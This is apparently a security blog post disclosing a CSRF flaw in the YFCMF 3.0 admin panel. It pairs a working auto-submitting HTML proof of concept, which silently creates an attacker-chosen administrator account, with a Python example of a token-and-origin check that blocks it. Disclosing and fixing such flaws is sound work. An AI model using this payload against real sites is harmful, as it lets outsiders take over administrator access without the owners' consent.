Hpdoger's Blog.

Csrf in YFCMF 3.0

2018/08/23

Description

The back-end action that creates administrator accounts (admin/admin/adminsave) accepts a plain POST with no anti-CSRF token and no origin check. If an administrator who is logged in to the YFCMF back end visits an attacker-controlled page, that page can auto-submit the form below in the administrator's browser and a new administrator account of the attacker's choosing is created without the victim noticing.

Poc

<html>
<!-- Auto-submitting form aimed at the add-administrator action. The action
     path is relative, so as written the page only fires when served from the
     same host as the YFCMF install; an attacker hosting it elsewhere would
     put the target's full URL in action. -->
<form action="/YFCMF/admin/admin/adminsave.html" method="post">
<!-- group_id presumably picks the administrator group for the new account.
     The original used <option value="2"/>, which is not valid HTML (option has
     no self-closing form); browsers still submit "2" because the first option
     of a single select is selected by default, but spelling it out is clearer. -->
<select name="group_id" required="">
<option value="2" selected>2</option>
</select>
<input name="username" value="csrf" type="hidden"/>
<input name="password" value="123" type="hidden"/>
<input name="email" value="csrf@1.com" type="hidden"/>
<input name="realname" value="csrf" type="hidden"/>
</form>
<script>
// Submit as soon as the page loads; no click from the victim is needed.
document.forms[0].submit();
</script>
</html>

Reproduction

1. Log in to the YFCMF back end as an administrator and note the existing administrator list.

2. In the same browser session, open the crafted CSRF page above; it submits the form to adminsave without any interaction.

3. Reload the administrator list: a new account "csrf" (password 123, email csrf@1.com) has been added.
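The root cause is that adminsave trusts any POST that arrives with a valid admin session cookie. The standard fix is a synchronizer token bound to the session plus an Origin/Referer check, so that a form the attacker builds on another site fails both. The following is an added illustration of that check written for this post, not YFCMF's or ThinkPHP's code; the request is modelled as a header dict and a form dict, the trusted origin and the `__token__` field name are assumptions, and the attacker request is a constructed copy of the PoC's fields.

```python
"""Synchronizer-token plus origin check for an add-administrator endpoint.

Added example for this post, not YFCMF code. Requests are modelled as plain
dicts (headers, form fields) so the logic can run without a web framework.
"""
import hmac
import secrets
from dataclasses import dataclass, field

# Assumption: the origin the admin panel is served from.
TRUSTED_ORIGIN = "https://admin.example.com"
# Assumption: the hidden field name carrying the token.
TOKEN_FIELD = "__token__"


@dataclass
class Session:
    """Server-side session for a logged-in administrator."""
    user: str
    # One unguessable token per session; it never leaves the server except
    # inside pages rendered for this session, so a third-party page cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def render_admin_form(session: Session) -> dict:
    """Hidden fields the legitimate add-administrator form carries."""
    return {TOKEN_FIELD: session.csrf_token}


def origin_allowed(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is our own.

    Browsers send Origin on every cross-site POST, so a missing header is
    treated as hostile (fail closed) rather than as same-origin.
    """
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False
    return origin == TRUSTED_ORIGIN or origin.startswith(TRUSTED_ORIGIN + "/")


def token_valid(session: Session, form: dict) -> bool:
    """Constant-time comparison of the submitted token with the session's."""
    submitted = form.get(TOKEN_FIELD)
    if not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(submitted, session.csrf_token)


def admin_save(session: Session, headers: dict, form: dict) -> dict:
    """Guarded version of the add-administrator action.

    Returns the record that would be stored, or raises PermissionError when the
    request looks cross-site. Both checks are independent: the attacker's page
    cannot set Origin to ours, and cannot read the token to include it.
    """
    if not origin_allowed(headers):
        raise PermissionError("cross-site request blocked by origin check")
    if not token_valid(session, form):
        raise PermissionError("missing or invalid CSRF token")
    for name in ("username", "password", "email", "realname", "group_id"):
        if not form.get(name):
            raise ValueError(f"missing field {name}")
    return {
        "username": form["username"],
        "email": form["email"],
        "realname": form["realname"],
        "group_id": int(form["group_id"]),
        "created_by": session.user,
    }


if __name__ == "__main__":
    session = Session(user="admin")
    # Constructed copy of the PoC's fields: no token, sent from another site.
    poc_form = {"group_id": "2", "username": "csrf", "password": "123",
                "email": "csrf@1.com", "realname": "csrf"}
    try:
        admin_save(session, {"Origin": "https://attacker.example"}, poc_form)
    except PermissionError as exc:
        print("PoC request:", exc)
    # The real form rendered for this session carries the token.
    legit = {**poc_form, **render_admin_form(session)}
    print("legitimate request:", admin_save(session, {"Origin": TRUSTED_ORIGIN}, legit))
```

With this in place, the PoC above is rejected at the origin check before the token is even examined, and a page that somehow satisfied the origin check would still fail on the token it cannot read.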
